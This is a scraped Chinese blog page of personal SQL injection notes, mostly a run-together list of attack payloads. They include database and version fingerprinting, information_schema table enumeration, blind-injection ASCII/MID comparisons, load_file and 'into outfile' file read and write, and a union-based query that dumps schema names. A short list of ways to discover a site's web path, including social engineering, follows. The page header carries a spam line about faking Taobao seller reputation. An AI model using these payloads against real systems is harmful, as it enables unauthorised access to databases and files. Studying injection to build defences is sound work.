sql注入笔记
来源:互联网 发布:淘宝信誉积分怎么刷 编辑:程序博客网 时间:2024/06/05 03:38
select length(id) from ot_picture LIMIT 1select database(),user(),VERSION(),@@version_compile_os;select TABLE_NAME from information_schema.`TABLES` where TABLE_SCHEMA='xinghui'select (select top 1 asc(mid(列名,位数,1)) from admin)=97SELECT ASCII(MID(id,1,1)) from ot_picture LIMIT 1SELECT MID(id,1,1) from ot_picture LIMIT 1select user() ;//文件读取select load_file('D:/text.txt');//文件写入select 'aa',1,2 into outfile 'd:/text.txt'SELECT ASCII('a')SELECT MID('NowaMagic', 1, 2)select * from ot_ucenter_member where id=6171select * from ot_coin where id=8122 and (SELECT ASCII(MID(id,1,1)) from ot_picture LIMIT 1) =49
获取网站路径方法
1.报错显示
2.漏洞报错
3.遗留文件
4.读取配置文件
5.社工
union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 13,1),0x31303235343830303536,0x31303235343830303536
0 0
- sql注入笔记
- SQL注入学习笔记
- sql注入(笔记)
- sql注入学习笔记
- SQL注入学习笔记
- 预防SQL注入 学习笔记
- SQL 注入脚本学习笔记
- SQL注入学习笔记之SQL盲注
- sql注入攻击学习笔记之初识sql注入
- SQL注入中的一些原理笔记(手工注入)
- JDBC防止SQL注入(菜鸟笔记)
- SQL注入的一些笔记(一)
- sql注入文章阅读笔记(一)
- SQL注入学习笔记(一)
- SQL server手工注入学习笔记
- SQL注入学习笔记(一)
- 防止SQL注入的若干笔记
- sql注入学习笔记(未完待续)
- ORA-12519: TNS:no appropriate service handler found 解决
- 搭建ftp
- 【应用】Markdown 在线阅读器
- 张正友标定算法原理详解
- 判断字符串是否包含中文,过滤字符串中是否是整数或小数
- sql注入笔记
- Kafka系列之-Kafka Protocol实例分析
- 欢迎使用CSDN-markdown编辑器
- 漫步数学分析十二——嵌套
- 网页编辑器kindeditor的使用
- JAVA-for循环语句
- stl_alloc.h
- 使用jquery的delegate进行多项绑定
- 明明的随机数